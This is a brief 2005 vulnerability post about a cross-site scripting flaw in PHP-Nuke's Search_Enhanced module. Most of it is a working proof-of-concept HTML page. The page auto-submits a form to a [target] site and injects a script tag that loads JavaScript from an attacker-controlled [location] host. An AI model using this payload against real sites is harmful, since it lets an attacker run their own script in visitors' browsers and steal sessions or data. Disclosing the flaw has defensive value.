PHP-Nuke Search Cross-Site Scripting Vulnerability Vulnerable: i think all ver. data:2005-09-5 exploit : #openme.htm :: <html> <form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=index> <input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'> <input type=submit name=sub> <script>document.searchform.sub.click()</script> </html> thanks , B~HFH. email : bhfh@xxxxxxxxx